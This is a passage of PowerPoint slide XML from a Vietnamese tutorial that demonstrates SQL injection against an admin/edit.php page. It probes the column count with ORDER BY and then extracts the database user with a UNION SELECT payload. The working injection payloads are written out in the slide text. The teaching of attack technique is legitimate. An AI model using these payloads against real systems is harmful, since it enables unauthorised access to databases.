          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>
            <a:ext cx="8915400" cy="251607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Đ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>oán số cột của bảng đang truy vấn ở đây chúng ta dự đoán là 5.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Tiến hành truyền lệnh SQL vào ở đây ta sẽ truyền vào với nội dung GET/admin/edit.php?id=3+order+by+5 HTTP/1.1  .</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12203836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B340B-71FF-C285-0014-6A49A6D7886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0BCCD59-A1B8-2CB9-F71C-BF331F542701}"/>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2DD69230-6608-A5CF-5B0D-1C686BF0C73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205</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADE40C97-E2E2-E6E9-F07B-7907AD2CC40F}"/>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Kết </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>báo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lỗi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> undefined variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dự</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>đoán</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>rằng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>số</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cột</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>phải</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4800E05-13CC-52A1-DC15-D97DB67605A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="1237908"/>
            <a:ext cx="7696200" cy="4311969"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37346537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E46AF-D146-DF00-DCF5-659616192B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79E4570-0CE7-9D5C-706C-815830DDC12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E2B6D9D-A4F8-CEAF-7FE0-BC0B3FE9BBE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206</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70D898BB-1FA9-6E29-A64B-27FAE5CB4E1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>
            <a:ext cx="8915400" cy="113107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Thay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>đổi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dự</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>đoán</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> 4</a:t>
            </a:r>
          </a:p>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Response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lỗi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vậy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>số</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cột</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>rất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chắc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chắn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> 4.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B88E04D-3957-2618-E40B-19B152BAB5AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1389793"/>
            <a:ext cx="8229600" cy="4312507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19080210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95083-8B63-CDF1-D2F3-00FCCFE64E1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A6035E0-118C-4323-6A3C-8F465C35162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30EC2F56-2611-31FB-8224-9AE66B14E1D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207</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90950FFA-199F-674B-117C-3C447ECE3EAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>
            <a:ext cx="8915400" cy="1705594"/>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2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Giờ ta sửa thành một lệnh SQL tinh vi hơn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>GET/admin/edit.php?id=0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>UNION SELECT 1,2,user(),4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>HTTP/1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Qua lệnh này chúng ta sẽ biết được người dùng hiện tại đang là ai và có giá trị gì.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC282947-E660-685E-CE86-68BD1E46A39E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="153494" y="1969280"/>
            <a:ext cx="8837012" cy="3580597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39230494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2C8E4-19C0-1B99-C4F6-D5E8A1CE8B4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C15842-5C7A-36CC-BE2B-B8D8CD1611F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31F62B6-C20E-2CC7-7665-B6030C0C9B2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208</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E68F6707-E945-2DFD-FEF4-9D739269A07D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Tuy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nhiên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>0 UNION SELECT 1,2,user(),4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>khoảng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trắng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> ở </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>giữ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> decode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>câu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> ở </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nó</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51E56E6C-E22A-2001-4D86-ED40BEB43D89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="69049" y="1814000"/>
            <a:ext cx="9005902" cy="2590799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15567917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608EC-44EF-3A2E-6085-0BED3A77E1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35DD35A-02E1-0D0D-B79F-01425C91BBC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240516BF-D641-4D09-B6A0-5494C9BCFEC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209</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E51C340-8689-99E4-9CF6-19AAF2F84D15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
